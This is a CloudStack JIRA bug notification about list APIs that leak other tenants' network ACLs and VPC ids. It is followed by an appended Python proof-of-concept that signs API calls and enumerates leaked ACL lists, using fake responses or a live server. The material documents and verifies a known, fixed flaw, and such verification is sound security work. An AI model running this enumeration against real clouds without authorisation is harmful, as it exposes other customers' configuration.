cloudstack-issues mailing list archives

From "Marcus Sorensen (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (CLOUDSTACK-5145) ListNetworkACL API should list ACLs owned by the user only
Date Tue, 03 Dec 2013 17:14:36 GMT

     [ https://issues.apache.org/jira/browse/CLOUDSTACK-5145?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Marcus Sorensen updated CLOUDSTACK-5145:
----------------------------------------

    Description: 
ListNetworkACL API should filter ACLs by caller and list ACLs which can be accessed by the
user only. 

If the API call is made without a networkid or other filter, every ACL in the system is dumped,
which is both a performance issue and a security issue. If a networkid is provided, but the
network doesn't have an ACL list or any ACL items attached, the same issue occurs.

Likewise, listNetworkACLLists gives access to see non-owned lists, which in turn gives vpc
ids for non-owned resources.

Example:

1. Set up a zone
2. Create a VPC or network as admin
3. Create an ACL list for the network
4. Create a new domain and unprivileged user
5. Generate API keys for user
6. Issue a 'listNetworkACLs' API call. You should see the ACL list items from the admin-owned
list
7. Issue a 'listNetworkACLLists' API call referencing aclid from non-owned acl item. You should
see the acl list info and which vpc it belongs to. 
8. Listing the vpc attached to the acl list properly stops with an 'unauthorized' response
as step 7 above should.

  was:ListNetworkACL API should filter ACLs by user and list ACLs which can be accessed by
the user only


> ListNetworkACL API should list ACLs owned by the user only
> ----------------------------------------------------------
>
>                 Key: CLOUDSTACK-5145
>                 URL: https://issues.apache.org/jira/browse/CLOUDSTACK-5145
>             Project: CloudStack
>          Issue Type: Bug
>      Security Level: Public(Anyone can view this level - this is the default.) 
>            Reporter: Kishan Kavala
>            Assignee: Kishan Kavala
>            Priority: Blocker
>             Fix For: 4.2.1, 4.3.0
>



--
This message was sent by Atlassian JIRA
(v6.1#6144)
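The walk in steps 6 to 8 of the report, written up as an added example (not code from the CLOUDSTACK-5145 ticket or from the CloudStack code base): with an unprivileged user's keys, take every aclid the unfiltered listNetworkACLs returns, resolve each to its list and vpcid through listNetworkACLLists, and then ask listVPCs for that vpcid. Any aclid whose VPC the caller is denied is an ACL list that was leaked across tenants. The request signing follows CloudStack's documented scheme (sorted, lowercased query string, HMAC-SHA1, base64); the response keys (listnetworkaclsresponse, listnetworkacllistsresponse, listvpcsresponse, the networkacl and vpc arrays, the aclid and vpcid fields) are taken from the 4.x JSON API; the errorcode 531 body, the endpoint URL, the API keys and the FAKE_RESPONSES data are all constructed for this example.

```python
import base64
import hashlib
import hmac
import json
import urllib.error
import urllib.parse
import urllib.request


def sign_query(params, api_key, secret_key):
    """Return a signed query string for one CloudStack API call.

    CloudStack's documented scheme: sort the parameters by name, URL-encode
    the values (spaces as %20), lowercase the whole string, HMAC-SHA1 it with
    the secret key and append the base64 digest as `signature`.
    """
    def enc(value):
        return urllib.parse.quote_plus(str(value)).replace("+", "%20")

    full = {k.lower(): v for k, v in params.items()}
    full.update(apikey=api_key, response="json")
    query = "&".join(f"{k}={enc(v)}" for k, v in sorted(full.items()))
    mac = hmac.new(secret_key.encode(), query.lower().encode(), hashlib.sha1)
    signature = base64.b64encode(mac.digest()).decode()
    return query + "&signature=" + enc(signature)


def make_sender(endpoint, api_key, secret_key):
    """Build send(command, **params) -> decoded JSON for a live management
    server, e.g. endpoint="http://mgmt.example:8080/client/api" (hypothetical)."""
    def send(command, **params):
        url = endpoint + "?" + sign_query(dict(params, command=command), api_key, secret_key)
        try:
            with urllib.request.urlopen(url) as resp:
                return json.load(resp)
        except urllib.error.HTTPError as err:
            # A permission failure is an HTTP error whose JSON body carries errorcode/errortext
            return json.load(err)
    return send


def walk_acl_ownership(send):
    """Steps 6-8 of the report as a check.

    `send(command, **params)` returns the decoded JSON body of one API call;
    the transport is injected so the walk can run offline against fake_send.
    Returns {aclid: vpcid} for every ACL list reachable through the unfiltered
    listNetworkACLs whose VPC the caller is then denied, i.e. lists the caller
    should never have seen.
    """
    # Step 6: unfiltered listing; with the bug this dumps every ACL item in the system
    items = send("listNetworkACLs").get("listnetworkaclsresponse", {}).get("networkacl", [])
    aclids = sorted({it["aclid"] for it in items if it.get("aclid")})
    leaked = {}
    for aclid in aclids:
        # Step 7: the item's aclid resolves to its list, which names the owning VPC
        lists = send("listNetworkACLLists", id=aclid).get("listnetworkacllistsresponse", {})
        for acl in lists.get("networkacl", []):
            vpcid = acl.get("vpcid")
            if not vpcid:
                continue
            # Step 8: only the VPC lookup enforces ownership; a denial here proves the leak
            vpc = send("listVPCs", id=vpcid).get("listvpcsresponse", {})
            if "errorcode" in vpc:
                leaked[aclid] = vpcid
    return leaked


# Constructed responses standing in for the management server in the situation
# the report describes: the caller owns VPC "vpc-user" and its list "acl-user";
# "acl-admin" and "vpc-admin" belong to the admin account.
FAKE_RESPONSES = {
    ("listNetworkACLs", ()): {"listnetworkaclsresponse": {"count": 3, "networkacl": [
        {"id": "item-1", "aclid": "acl-admin", "protocol": "tcp", "action": "Allow"},
        {"id": "item-2", "aclid": "acl-admin", "protocol": "udp", "action": "Deny"},
        {"id": "item-3", "aclid": "acl-user", "protocol": "icmp", "action": "Allow"},
    ]}},
    ("listNetworkACLLists", (("id", "acl-admin"),)): {"listnetworkacllistsresponse": {
        "count": 1, "networkacl": [{"id": "acl-admin", "name": "admin-acl", "vpcid": "vpc-admin"}]}},
    ("listNetworkACLLists", (("id", "acl-user"),)): {"listnetworkacllistsresponse": {
        "count": 1, "networkacl": [{"id": "acl-user", "name": "user-acl", "vpcid": "vpc-user"}]}},
    # Constructed denial body; CloudStack returns such a body with HTTP 401 for a foreign VPC
    ("listVPCs", (("id", "vpc-admin"),)): {"listvpcsresponse": {
        "errorcode": 531, "errortext": "caller does not have permission to access resource vpc-admin"}},
    ("listVPCs", (("id", "vpc-user"),)): {"listvpcsresponse": {
        "count": 1, "vpc": [{"id": "vpc-user", "name": "user-vpc"}]}},
}


def fake_send(command, **params):
    """Offline stand-in for make_sender(); answers from FAKE_RESPONSES."""
    return FAKE_RESPONSES[(command, tuple(sorted(params.items())))]


if __name__ == "__main__":
    print(walk_acl_ownership(fake_send))  # {'acl-admin': 'vpc-admin'}
```

Against a real server, swap fake_send for make_sender(endpoint, user_api_key, user_secret_key) with the keys generated in step 5; on a fixed build the unfiltered listNetworkACLs returns only the caller's items and the result is an empty dict. The 531/401 denial is treated generically (any errorcode in the listVPCs body), so the check does not depend on the exact error text.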
